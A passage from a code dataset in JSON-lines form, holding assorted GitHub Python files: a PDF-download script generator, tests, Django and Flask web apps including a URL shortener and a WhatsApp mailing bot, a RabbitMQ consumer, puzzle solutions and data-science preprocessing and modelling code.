open(URL_FN, 'r') as fd:\n urls = fd.readlines()\n urls = [x.strip() for x in urls if len(x.strip()) > 0]\n cmds = []\n for url in tqdm(urls):\n out_fn = OUT_DIR + url.split('/')[-1] + '.pdf'\n cmd = f'curl \"{url.strip()}\" -o {out_fn}'\n 
cmds.append(cmd)\n\n with open('/root/lca/abstract/acs/fetch_pdfs.sh', 'w') as fd:\n fd.write('\\n'.join(cmds))\n","repo_name":"griff4692/abstract_gen","sub_path":"abstract/data/acs/fetch_pdfs.py","file_name":"fetch_pdfs.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"36713688776","text":"\"\"\"\nTesting for the math.py module\n\"\"\"\n\nimport octo_tribble as ot\nimport pytest\n\ndef test_add():\n assert ot.math.add(5, 2) == 7\n assert ot.math.add(2, 5) == 7\n\ntestdata = [\n (2, 5, 10),\n (1, 2, 2),\n (11, 9, 99),\n (11, 0, 0),\n (0, 0, 0),\n]\n\n@pytest.mark.parametrize(\"a,b,expected\", testdata)\ndef test_mult(a, b, expected):\n assert ot.math.mult(a, b) == expected\n assert ot.math.mult(b, a) == expected\n\ntestdata2 = [\n (1, 2, 95),\n (0, 0, 42),\n (-5, 10, 30167),\n (2, 2, 110),\n (3, 7, 7290),\n]\n\n@pytest.mark.parametrize(\"a,b,expected\", testdata2)\ndef test_awesome(a, b, expected):\n assert ot.submodule.more_functs.awesome(a, b) == expected\n\n\n","repo_name":"mlestep/ideal-octo-tribble","sub_path":"tests/test_math.py","file_name":"test_math.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19705878766","text":"from vao import VAO\nfrom texture import Texture\n\n\nclass Mesh:\n def __init__(self, app):\n self.app = app\n self.vao = VAO(app.ctx)\n self.texture = Texture(app)\n\n def destroy(self):\n self.vao.destroy()\n self.texture.destroy()","repo_name":"StanislavPetrovV/3D-Graphics-Engine","sub_path":"mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"51"} +{"seq_id":"3595062450","text":"from django.urls import path\r\n\r\nfrom .views import moderate, \\\r\n member_topics, commented_topics, recently_viewed, \\\r\n add_topic, add_post, edit_post, delete_post, \\\r\n topic_list, post_list, category_list, \\\r\n forum_search, new_topics\r\n\r\n\r\nurlpatterns = [\r\n path(\r\n 'moderation///',\r\n moderate,\r\n name='mod_topic'\r\n ),\r\n # member urls\r\n path('my-topics/', member_topics, name=\"member_topics\"),\r\n path('member-topics//', member_topics, name=\"topics_for_user\"),\r\n path('my-commented-topics', commented_topics, name=\"commented_topics\"),\r\n path('recently-viewed', recently_viewed, name=\"recently_viewed\"),\r\n\r\n # CRUD\r\n path('add-topic/', add_topic, name=\"generic_add_topic\"),\r\n path('/add-topic/', add_topic, name=\"add_topic\"),\r\n path(\r\n 'add_post///',\r\n add_post,\r\n name=\"add_post\"\r\n ),\r\n path(\r\n 'add_post////',\r\n add_post,\r\n name=\"post_with_quote\"\r\n ),\r\n path('edit_post//', edit_post, name=\"edit_post\"),\r\n path(\r\n 'delete_post///',\r\n delete_post,\r\n name='delete_post'\r\n ),\r\n\r\n path('search/', forum_search, name='fretboard_search'),\r\n path('new-topics/', new_topics, name=\"new_topics\"),\r\n path('new-topics/page/', new_topics, name=\"new_topics_paginated\"),\r\n path('latest-topics/', new_topics, name=\"new_24_hours\"),\r\n path('latest-topics/page/', new_topics, name=\"new_24_hours_paginated\"),\r\n # topic lists\r\n path('/', topic_list, name=\"topic_list\"),\r\n path('/page/', topic_list, name=\"topic_list_paginated\"),\r\n # post lists\r\n path(\r\n '///page/',\r\n post_list,\r\n name=\"post_list_paginated\"\r\n ),\r\n path(\r\n '///',\r\n post_list,\r\n 
name=\"post_short_url\"\r\n ),\r\n path('', category_list, name='fretboard_index'),\r\n]\r\n","repo_name":"tBaxter/django-fretboard","sub_path":"fretboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"51"} +{"seq_id":"15707392783","text":"import os\nall_files = os.listdir(os.curdir)\nfile_dict = dict()\n\nfor each_file in all_files:\n\tif os.path.isfile(each_file): #os.path.isfile() 判断路径是否为文件 \n\t\tfile_size = type_dict.path.getsize(each_file) #os.path.getsize() #返回文件大小(byte)\n\t\tfile_dict[each_file] = file_size\n\nfor each in file_dict.items():\t\t#dict.items() 以列表返回可遍历的(键, 值) 元组数组\n\tprint('%s的大小是 【%dBytes】 ' % (each[0], each[1]))\n","repo_name":"zhsword/exercise","sub_path":"Copy/Files size statistics.py","file_name":"Files size statistics.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26556724992","text":"from operator import sub\n\ndef sign(x):\n return 1 if x > 0 else -1\n\ndef add_tuples(a,b):\n return tuple(sum(x) for x in zip(a,b))\n\nwith open(\"9.txt\") as f:\n moves = [(direction, int(distance)) for direction, distance in (line.rstrip(\"\\n\").split(\" \") for line in f)]\n\nmovements = {\n \"R\": (1,0),\n \"L\": (-1,0),\n \"U\": (0,1),\n \"D\": (0,-1)\n}\n\ndef get_visited(length):\n rope = [(0,0) for _ in range(length)]\n\n visited = set()\n\n for direction, distance in moves:\n movement = movements[direction]\n for i in range(distance):\n rope[0] = add_tuples(rope[0],movement)\n for i in range(1,length):\n prev_knot, cur_knot = rope[i-1:i+1]\n diff_x, diff_y = (sub(*x) for x in zip(prev_knot,cur_knot))\n tail_x, tail_y = cur_knot\n if abs(diff_x) > 1 or abs(diff_y) > 1:\n if diff_y == 0:\n tail_x += sign(diff_x)\n elif diff_x == 0:\n tail_y += sign(diff_y)\n else:\n tail_x += sign(diff_x)\n tail_y += sign(diff_y)\n rope[i] = (tail_x,tail_y)\n visited.add(rope[-1])\n \n return len(visited)\n\nprint(get_visited(2))\nprint(get_visited(10))","repo_name":"jackstrosahl/advent-of-code-2022","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72158492639","text":"from __future__ import annotations\nfrom typing import Optional\nfrom .base import BaseEnvManager, EnvExistsError, EnvironmentEntry, is_package_entry\nimport subprocess\nimport json\nimport os\nimport yaml\nfrom ..logger import ENVPICKER_LOGGER\n\n\nclass CondaManager(BaseEnvManager):\n CONDACMD = \"conda\"\n\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.condainfo = json.loads(\n subprocess.check_output([self.CONDACMD, \"info\", \"--json\"]).decode(\"utf-8\")\n )\n\n @classmethod\n def is_available(cls) -> bool:\n try:\n _ = subprocess.check_output([cls.CONDACMD, \"--version\"])\n return True\n except Exception:\n return False\n\n def register_all(self) -> None:\n \"\"\"Register all available environments.\"\"\"\n\n env_list_output = subprocess.check_output(\n [self.CONDACMD, \"env\", \"list\", \"--json\"]\n )\n env_list_json = json.loads(env_list_output.decode(\"utf-8\"))\n environments = env_list_json[\"envs\"]\n r = 0\n for env_path in environments:\n env = self.get_env_by_path(env_path)\n if env:\n continue\n\n env_name = os.path.basename(\n env_path\n ) # by default, use the name of the directory as the environment 
name\n\n # Register the environment using add_env function\n try:\n self.register_environment(\n path=env_path,\n py_executable=None,\n name=env_name,\n force=False,\n )\n ENVPICKER_LOGGER.info(\n \"Successfully registered %s (%s)\", env_name, env_path\n )\n r += 1\n except EnvExistsError:\n continue\n ENVPICKER_LOGGER.info(\"Successfully registered %s environments.\", r)\n\n def get_dependencies(self, env: EnvironmentEntry):\n yaml_string = subprocess.check_output(\n [\n self.CONDACMD,\n \"env\",\n \"export\",\n \"--no-builds\",\n \"-p\",\n env[\"path\"],\n ]\n )\n yaml_string = yaml_string.decode(\"utf-8\")\n data = yaml.safe_load(yaml_string)\n deps = []\n for entry in data[\"dependencies\"]:\n if is_package_entry(entry):\n deps.append(entry)\n elif isinstance(entry, dict):\n if \"pip\" in entry:\n for pip_entry in entry[\"pip\"]:\n if is_package_entry(pip_entry):\n deps.append(pip_entry)\n\n return deps\n\n\nclass MambaManager(CondaManager):\n CONDACMD = \"mamba\"\n","repo_name":"Linkdlab/EnvPicker","sub_path":"envpicker/manager/conda_mngr.py","file_name":"conda_mngr.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5504903274","text":"import board # board module lets us use the hardware\nimport neopixel # add the neopixel module\n\n# Update this to match the number of NeoPixel LEDs connected to your board.\nnum_pixels = 5\n\n# Set up neopixel module with an object called 'pixels'\npixels = neopixel.NeoPixel(board.GP22, num_pixels)\n\n# Set brightness between 0. and 1.\npixels.brightness = 0.5\n\nwhile True:\n # .fill sets all pixels to an RGB value instantly\n pixels.fill((255, 0, 0))\n","repo_name":"AidanTek/PicoCircuitPythonTutorial","sub_path":"fillcolour.py","file_name":"fillcolour.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35414728212","text":"# Problem Statement Link : https://www.spoj.com/problems/SAMER08F/\nwhile True:\n\tn = int(input())\n\tif n == 0:\n\t\tbreak\n\tans = 0\n\twhile n > 1:\n\t\tans += n * n\n\t\tn -= 1\n\tprint(ans + 1)\n","repo_name":"sonushahuji4/SPOJ","sub_path":"8_Feynman.py","file_name":"8_Feynman.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72164321758","text":"import pika, sys, os\nimport mysql.connector,logging, json\n\n\ndb = mysql.connector.connect(host=\"AccountSQL\", user=\"root\", password=\"root\",database=\"stellar_account\")\ndbc = db.cursor(dictionary=True)\n\n\ndef main():\n def get_message(ch, method, properties, body):\n route = method.routing_key\n \n # Parse json data di dalam 'body' untuk mengambil data terkait event\n data = json.loads(body)\n event = data['event']\n id = data['id']\n username = data['username']\n account_id = data['account_id']\n\n # Tambah jumlah order sebanyak 1 untuk id kantin tertentu\n if route == '*.change':\n sql = \"UPDATE Account SET username=%s WHERE id=%s;\"\n dbc.execute(sql, [username, account_id] )\n elif route == '*.remove':\n sql = \"DELETE FROM Account WHERE username=%s;\"\n dbc.execute(sql, [username] )\n\n db.commit()\n\n # tampilkan pesan bahwa event sudah diproses\n message = 'id: ' + str(id) + ' - username: ' + str(username)\n logging.warning(\"%r : %r\" % str(event), message)\n \n # acknowledge message dari RabbitMQsecara manual yang \n # menandakan message telah selesai 
diproses\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\n\n # buka koneksi ke server RabbitMQ di PetraMQ\n credentials = pika.PlainCredentials('radmin', 'rpass')\n connection = pika.BlockingConnection(pika.ConnectionParameters('EOMQ',5672,'/',credentials))\n channel = connection.channel()\n\n # Buat exchange dan queue\n queue_name = 'account_queue'\n channel.exchange_declare(exchange='EOEX', exchange_type='topic')\n channel.queue_declare(queue=queue_name, exclusive=True)\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='client.change')\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='staff.change')\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='client.remove')\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='staff.remove')\n\n # Ambil message dari RabbitMQ (bila ada)\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(queue=queue_name, on_message_callback=get_message)\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","repo_name":"adrianwinaya2/Stellar-Production","sub_path":"5_account_service/AccountCons/account_consumer.py","file_name":"account_consumer.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41572676127","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport datetime\r\nimport random\r\nimport warnings\r\nimport seaborn as sns\r\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\r\nfrom sklearn.decomposition import PCA\r\n\r\ndef get_data_and_labels(df):\r\n labels = df[\"Classes\"].to_frame()\r\n df = df.drop(columns=\"Classes\", axis=1)\r\n return df,labels\r\n\r\ndef create_features(df, window, ignore_cols):\r\n stats = ['max_','min_','mean_','median_']\r\n for attribute in df.columns:\r\n if attribute in ignore_cols:\r\n continue\r\n\r\n df[stats[0]+attribute] = df.rolling(window, on=\"Date\", axis=0, closed= \"left\").max().fillna(0)[attribute]\r\n df[stats[0]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").max().fillna(0)[attribute][1::2]\r\n \r\n df[stats[1]+attribute] = df[attribute].rolling(window, closed= \"left\").min().fillna(0)\r\n df[stats[1]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").min().fillna(0)[attribute][1::2]\r\n\r\n df[stats[2]+attribute] = df[attribute].rolling(window, closed= \"left\").mean().fillna(0)\r\n df[stats[2]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").mean().fillna(0)[attribute][1::2]\r\n\r\n df[stats[3]+attribute] = df[attribute].rolling(window, closed= \"left\").median().fillna(0)\r\n df[stats[3]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").median().fillna(0)[attribute][1::2]\r\n\r\n\r\ndef perform_data_standardization(data, method=\"StandardScaler\"):\r\n # except date, take all columnsdata\r\n # cols = data.columns.difference(['Date'])\r\n cols = data.columns\r\n if method == \"StandardScaler\":\r\n scaler = StandardScaler(copy = True)\r\n # scaler.fit(data[cols])\r\n data[cols] = scaler.fit_transform(data[cols])\r\n elif method == \"MinMaxScaler\":\r\n scaler = MinMaxScaler(copy = True)\r\n # scaler.fit(data[cols])\r\n data[cols] = scaler.fit_transform(data[cols])\r\n return data, scaler\r\n\r\n## split of 
train and val data \r\ndef split_data(df,labels, gap = 4, train_perc=0.8):\r\n train_size = int(0.8 * len(df))\r\n val_size = len(df) - train_size\r\n train_data, train_label = df[:train_size], labels[:train_size]\r\n val_data, val_label = df[train_size+gap:], labels[train_size+gap:]\r\n train_df = pd.DataFrame(train_data)\r\n val_df = pd.DataFrame(val_data)\r\n return train_df,train_label,val_df,val_label\r\n\r\ndef PCA_Reduction(data, n_components=5, mode=\"train\"):\r\n if mode == \"train\":\r\n pca = PCA(n_components=n_components)\r\n pca.fit(data)\r\n x_pc = pca.transform(data)\r\n elif mode == \"test\":\r\n x_pc = pca.transform(data)\r\n\r\n return x_pc\r\n \r\ndef get_correlated_features(data,threshold):\r\n col_corr = set()\r\n corr_matrix = data.corr()\r\n plt.rcParams['figure.figsize'] = (15,15)\r\n sns.heatmap(corr_matrix,annot=True,cmap='viridis',linewidths=.05)\r\n for i in range(len(corr_matrix.columns)):\r\n for j in range(i):\r\n if abs(corr_matrix.iloc[i,j]) > threshold:\r\n colname = corr_matrix.columns[i]\r\n col_corr.add(colname)\r\n return col_corr\r\n\r\n","repo_name":"Divya-Nandlal-Sahetya/Predicting-Forest-Fire-in-Algeria-Using-Machine-Learning-Techniques","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28360334945","text":"\nimport numpy as np\nimport nltk\n# nltk.download('punkt')\nfrom nltk.stem.porter import PorterStemmer\nstemmer = PorterStemmer()\n\n\ndef tokenize(sentence):\n return nltk.word_tokenize(sentence)\n\ndef stem(word):\n return stemmer.stem(word.lower())\n\ndef bag_of_words(tokenized_sentence, all_words):\n \n tokenized_sentence = [stem(w) for w in tokenized_sentence]\n\n bag = np.zeros(len(all_words) , dtype = np.float32)\n for index, w in enumerate(all_words):\n if w in tokenized_sentence:\n bag[index] = 1.0\n \n return bag\n\n# Training Data Example\n\nsentence = ['hello', 'how', 'are', 'you']\nwords = ['hi', 'hello', 'bye', 'goodbye', 'thank', 'cool', 'how']\nbag = bag_of_words(sentence, words)\n# print(bag)\n\n\n#Testing the Stemming \nwords = ['Organize', 'Organizing', 'organizes', 'panic','panicing']\nstemmed_words = [stem(w) for w in words]\n\n\n\n\n","repo_name":"richab246/Chatbot","sub_path":"backend/nltk_utils.py","file_name":"nltk_utils.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22037721279","text":"from django.forms import Textarea, TextInput\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.views import generic\n\nimport os\n\n# from django.contrib.messages.views import SuccessMessageMixin TODO: use mixin?\n\nfrom .oauth_view import GET_GOOGLE_OAUTH2_MSG, GET_GOOGLE_OAUTH2_INSECURE_VALUE\n\nfrom .models import BotSettings, BotLogModel\nfrom .forms import (\n BotSettingsForm,\n FormStatus,\n create_bot_settings_form_factory,\n get_form_status_str,\n)\n\nfrom apps.web.src_bot.common.google.api import (\n get_google_auth_url,\n is_google_token_valid,\n refresh_google_token,\n)\n\nfrom .validators.bot_settings import (\n ValidationWarn,\n ValidationError,\n _ as gettext_lazy,\n)\n\nfrom .src_bot.mailing import *\nfrom .src_bot.common.google.api import *\n\n\nBOT_SETTINGS_FORM_CLASS = BotSettingsForm\nBOT_LOG_MODEL_CLASS = BotLogModel\n\nK_ID_DATA_COLUMN_GOOGLE_SHEET = (\n 
BOT_SETTINGS_FORM_CLASS.Meta.K_ID_DATA_COLUMN_GOOGLE_SHEET\n)\nK_ID_GOOGLE_SHEET = BOT_SETTINGS_FORM_CLASS.Meta.K_ID_GOOGLE_SHEET\nK_TO_SEND_MESSAGE = BOT_SETTINGS_FORM_CLASS.Meta.K_TO_SEND_MESSAGE\n\n\ndef _make_bot_settings_widgets(values_in_placeholders_map=None):\n values_are_not_none = (\n False if (values_in_placeholders_map is None) else True\n )\n values_map = {\n K_TO_SEND_MESSAGE: values_in_placeholders_map[K_TO_SEND_MESSAGE]\n if values_are_not_none\n else \"\",\n K_ID_GOOGLE_SHEET: values_in_placeholders_map[K_ID_GOOGLE_SHEET]\n if values_are_not_none\n else \"\",\n K_ID_DATA_COLUMN_GOOGLE_SHEET: values_in_placeholders_map[\n K_ID_DATA_COLUMN_GOOGLE_SHEET\n ]\n if values_are_not_none\n else \"\",\n }\n\n widgets = {\n K_TO_SEND_MESSAGE: Textarea(\n attrs={\n \"class\": \"input input--stretch input--xl send--message--input\",\n \"placeholder\": f\"Введите сообщение для отправки. Текущее сообщение: {values_map[K_TO_SEND_MESSAGE]}\",\n },\n ),\n K_ID_GOOGLE_SHEET: TextInput(\n attrs={\n \"class\": \"input input--stretch input--s\",\n \"placeholder\": f\"ID Google-таблицы: {values_map[K_ID_GOOGLE_SHEET]}\",\n },\n ),\n K_ID_DATA_COLUMN_GOOGLE_SHEET: TextInput(\n attrs={\n \"class\": \"input input--stretch input--s\",\n \"placeholder\": f\"Столбик с номерами (A-Z), текущий столбик: {values_map[K_ID_DATA_COLUMN_GOOGLE_SHEET]}\",\n },\n ),\n }\n\n return widgets\n\n\n# Context Keys\n\nCK_BOT_SETTINGS_FORM = \"settings_form\"\nCK_LOG_BOT_LIST = \"log_list\"\nCK_WAS_ERROR = \"was_error\"\nCK_ON_FORM_POST_POPUP_TYPE = \"popup_type\" # FormStatus as str\nCK_ON_SEND_MESSAGES_POPUP = \"messages_are_sending_popup\"\nCK_ERRORS = \"errors\"\nCK_HAS_GOOGLE_TOKEN = \"has_google_token\"\n\n# Context Keys\n\n\ndef _update_context_err(context, msg, code):\n context[CK_ERRORS] = {\n \"msg\": [\n ValidationError(\n gettext_lazy(msg),\n code=code,\n )\n ]\n }\n\n\nclass WebMainView(generic.CreateView):\n template_name = \"web/base.html\"\n form_class = BOT_SETTINGS_FORM_CLASS\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n\n self.object = None\n self.get_context_data\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[CK_LOG_BOT_LIST] = BOT_LOG_MODEL_CLASS.objects.all()\n context[CK_BOT_SETTINGS_FORM] = self._create_bot_settings_form_factory(\n self._get_completed_bot_settings()\n )()\n\n context[CK_WAS_ERROR] = False\n\n refresh_google_token()\n context[CK_HAS_GOOGLE_TOKEN] = is_google_token_valid()\n\n if BOT_LOG_MODEL_CLASS.objects.all().count() > 5000:\n BOT_LOG_MODEL_CLASS.objects.all().delete()\n\n return context\n\n def get(self, request, *_, **kwargs):\n context = self.get_context_data(**kwargs)\n # BOT_SETTINGS_FORM_CLASS.Meta.model.objects.all().delete()\n\n return render(\n request,\n self.template_name,\n context,\n )\n\n def post(self, request, *_, **kwargs):\n context = self.get_context_data(**kwargs)\n\n settings_empty_on_first_set = self._are_settings_empty(request.POST)\n\n context[CK_WAS_ERROR] = (settings_empty_on_first_set,)\n context[CK_ON_FORM_POST_POPUP_TYPE] = get_form_status_str(FormStatus.OK)\n\n if request.POST.get(\"action\") == \"send\":\n if not context[CK_HAS_GOOGLE_TOKEN]:\n auth_url = get_google_auth_url()\n return redirect(auth_url)\n\n updated_context = self._handle_on_send_messages_btn_press(\n request, context\n )\n return render(request, self.template_name, updated_context)\n\n bot_settings_form: BOT_SETTINGS_FORM_CLASS = self.form_class(\n request.POST\n )\n\n if not 
settings_empty_on_first_set:\n bot_settings_form.save()\n\n form_is_valid = bot_settings_form.is_valid()\n if not form_is_valid or settings_empty_on_first_set:\n errors_data = bot_settings_form.errors.as_data()\n if not settings_empty_on_first_set:\n context[CK_ERRORS] = errors_data\n else:\n _update_context_err(\n context,\n \"Необходимо ввести все данные при первой настройке\",\n code=\"err_empty_settings_on_first_set\",\n )\n\n context[CK_ON_FORM_POST_POPUP_TYPE] = (\n get_form_status_str(FormStatus.ERR)\n if settings_empty_on_first_set\n or not all(\n isinstance(err[0], ValidationWarn)\n for err in errors_data.values()\n )\n else get_form_status_str(FormStatus.WARN)\n )\n if context[CK_ON_FORM_POST_POPUP_TYPE] == get_form_status_str(\n FormStatus.ERR\n ):\n for k, err in list(context[CK_ERRORS].items()):\n if isinstance(err[0], ValidationWarn):\n del context[CK_ERRORS][k]\n\n context[CK_WAS_ERROR] = True\n\n bot_settings_form_factory = (\n self._create_bot_settings_form_factory(\n self._get_completed_bot_settings()\n )\n if CK_ERRORS in context\n else self._create_bot_settings_form_factory(\n self._get_completed_bot_settings(request)\n )\n ) # we're rendering current bot settings in placeholders in widgets of inputs if data is ok\n\n context[CK_BOT_SETTINGS_FORM] = bot_settings_form_factory()\n\n return render(request, self.template_name, context)\n\n def _get_completed_bot_settings(self, request=None):\n # TODO: remove all non-relative for this view instances methods, that are not using `self`\n bot_settings = {\n K_ID_DATA_COLUMN_GOOGLE_SHEET: \"\",\n K_ID_GOOGLE_SHEET: \"\",\n K_TO_SEND_MESSAGE: \"\",\n }\n if request:\n for k, _ in bot_settings.items():\n bot_settings[k] = request.POST[k]\n\n manager = BotSettings.objects\n if manager.count() != 0:\n if len(bot_settings[K_TO_SEND_MESSAGE]) == 0:\n bot_settings[K_TO_SEND_MESSAGE] = manager.filter()[\n 0\n ].to_send_message\n bot_settings[K_ID_GOOGLE_SHEET] = manager.filter()[\n 0\n ].id_google_sheet\n if len(bot_settings[K_ID_DATA_COLUMN_GOOGLE_SHEET]) == 0:\n bot_settings[K_ID_DATA_COLUMN_GOOGLE_SHEET] = manager.filter()[\n 0\n ].id_data_column_google_sheet\n return bot_settings\n\n def _are_settings_empty(self, post_query) -> bool:\n no_settings_in_bd = self._get_all_bot_settings_records().count() == 0\n\n if not no_settings_in_bd:\n return False\n\n any_setting_is_empty_from_post = any(\n len(value) == 0 for value in post_query.values()\n )\n\n return no_settings_in_bd and any_setting_is_empty_from_post\n\n def _create_bot_settings_form_factory(\n self, bot_settings_to_show_in_widgets=None\n ):\n return create_bot_settings_form_factory(\n _make_bot_settings_widgets(bot_settings_to_show_in_widgets)\n )\n\n def _get_all_bot_settings_records(self):\n return BotSettings.objects.all()\n\n def _handle_on_send_messages_btn_press(self, request, context):\n try:\n bot_complete_settings = self._get_completed_bot_settings(request)\n generalMailing(bot_complete_settings)\n context[CK_ON_SEND_MESSAGES_POPUP] = get_form_status_str(\n FormStatus.OK\n )\n except Exception:\n _update_context_err(\n context,\n f\"Не удалось отправить сообщения. 
Подробнее в логе бота\",\n code=\"err_empty_settings_on_first_set\",\n )\n context[CK_ON_FORM_POST_POPUP_TYPE] = get_form_status_str(\n FormStatus.ERR\n )\n context[CK_WAS_ERROR] = True\n\n return context\n\n\ndef reset_settings(_):\n if os.path.exists(GoogleSheetsAuthData.TOKEN_PATH):\n os.remove(GoogleSheetsAuthData.TOKEN_PATH)\n\n return HttpResponse()\n\n\n__all__ = [\"WebMainView\", \"reset_settings\"]\n","repo_name":"illusior/whatsapp-bot","sub_path":"src/apps/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40058706553","text":"from flask import Flask, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nimport random\nimport string\n\n# create flask app\napp = Flask(__name__)\n\n# set up database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///shorturl.db'\ndb = SQLAlchemy(app)\n\n# create database class model\nclass UrlStore(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n longUrl = db.Column(db.String(), unique=True, nullable=False)\n shortUrl = db.Column(db.String(), unique=True, nullable=False)\n\n def __repr__(self) -> str:\n return f'Real url => {self.shortUrl} \\n Short url => {self.shortUrl}'\n\nwith app.app_context():\n db.create_all()\n\n# generate a short url\ndef generate_short_url():\n letters_digits = string.ascii_letters + string.digits\n short_url = ''.join(random.choice(letters_digits) for _ in range(7))\n url = UrlStore.query.filter_by(shortUrl=short_url).first()\n if url:\n # If the generated short URL already exists in the database,\n # generate a new one recursively\n return generate_short_url()\n return short_url\n\n# create root for home page\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n# shorten endpoint\n@app.route('/shorten', methods=['POST'])\ndef shorten():\n if request.method == 'POST':\n long_url = request.form['url']\n # check if user inputs long url and url does not exist in database\n if long_url and UrlStore.query.filter_by(longUrl=long_url).first() is None: \n short_url = generate_short_url()\n url = UrlStore(longUrl=long_url, shortUrl=short_url)\n db.session.add(url)\n db.session.commit()\n return render_template('result.html', short_url = short_url )\n else:\n return render_template(\"index.html\")\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"Inioluwajeremiah/UrlShortener","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3108527610","text":"from __future__ import print_function\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, average_precision_score, precision_recall_curve, roc_curve\nfrom matplotlib import pyplot as plt\nfrom MulticoreTSNE import MulticoreTSNE as TSNE\nimport numpy as np\nimport os\nimport plotly.offline as py\nimport plotly.graph_objs as go\nfrom datetime import datetime\nfrom retentioneering.analysis.utils import check_folder, get_all_agg, plot_graph_python\nimport pandas as pd\n\n\ndef str_agg(x):\n return ' '.join(x)\n\n\ndef create_filter(data, n_folds=None):\n all_events = set(data.event_name)\n x = data.groupby('event_name').user_pseudo_id.count()\n if n_folds is None:\n n_folds = (x.shape[0] // 200) + 1\n hist = np.histogram(x, bins=n_folds)\n while (hist[0] == 
0).sum() > 0:\n x = x[x < hist[1][n_folds - 2]]\n x = x[x > hist[1][0]]\n hist = np.histogram(x, bins=n_folds)\n return all_events - set(x.index)\n\n\nclass Model:\n def __init__(self, data, target_event, settings, event_filter=None,\n n_start_events=None, emb_type='tf-idf', ngram_range=(1, 3),\n emb_dims=None, embedder=None):\n\n self._source_data = data\n self.data = self._prepare_dataset(data, target_event, event_filter, n_start_events)\n self.features = self.data.event_name.values\n self.target = self.data.target.values\n self.users = self.data.user_pseudo_id.values\n self.emb_type = emb_type\n self._embedder = embedder\n self.ngram_range = ngram_range\n self.emb_dims = emb_dims\n self.roc_auc_score = None\n self.average_precision_score = None\n self.roc_c = None\n self.prec_rec = None\n self._check_folder(settings)\n\n if embedder:\n self._fit_vec = False\n else:\n self._fit_vec = True\n\n def _get_vectors(self, sample):\n if self._fit_vec:\n self._fit_vectors(sample)\n return self._embedder.transform(sample)\n\n def _fit_vectors(self, sample):\n if self.emb_type == 'tf-idf':\n from sklearn.feature_extraction.text import TfidfVectorizer\n tfidf = TfidfVectorizer(ngram_range=self.ngram_range)\n self._embedder = tfidf.fit(sample)\n self._fit_vec = False\n\n def _prepare_dataset(self, df, target_event, event_filter=None, n_start_events=None):\n if event_filter is not None:\n df = df[df.event_name.isin(event_filter)]\n df = df.sort_values('event_timestamp')\n train = df.groupby('user_pseudo_id').event_name.agg(str_agg)\n train = train.reset_index(None)\n train.event_name = train.event_name.apply(lambda x: x.split())\n train['target'] = train.event_name.apply(lambda x: x[-1] == target_event)\n train.event_name = train.event_name.apply(lambda x: x[:-1])\n if n_start_events:\n train.event_name = train.event_name.apply(lambda x: ' '.join(x[:n_start_events]))\n else:\n train.event_name = train.event_name.apply(lambda x: ' '.join(x))\n return train\n\n def _prepare_data(self):\n 